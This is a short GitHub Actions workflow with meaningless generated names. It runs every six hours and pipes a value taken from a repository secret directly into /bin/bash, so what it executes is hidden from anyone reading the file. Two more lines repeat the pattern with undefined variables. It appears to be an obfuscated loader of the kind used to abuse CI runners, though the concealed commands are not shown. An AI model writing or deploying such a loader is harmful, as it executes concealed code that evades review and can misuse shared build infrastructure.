name: qiuxuanya6543
on:
  workflow_dispatch:
  schedule:
    - cron: '19 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiuxuanya6543
        env:
          u53988: ${{ secrets.u53988 }}
        run: |
          echo $u53988 | jq -r .zkc40122 | /bin/bash
          echo $nce1 | jq -r .at5 | /bin/bash
          echo $w01300 | jq -r .umzc146 | /bin/bash

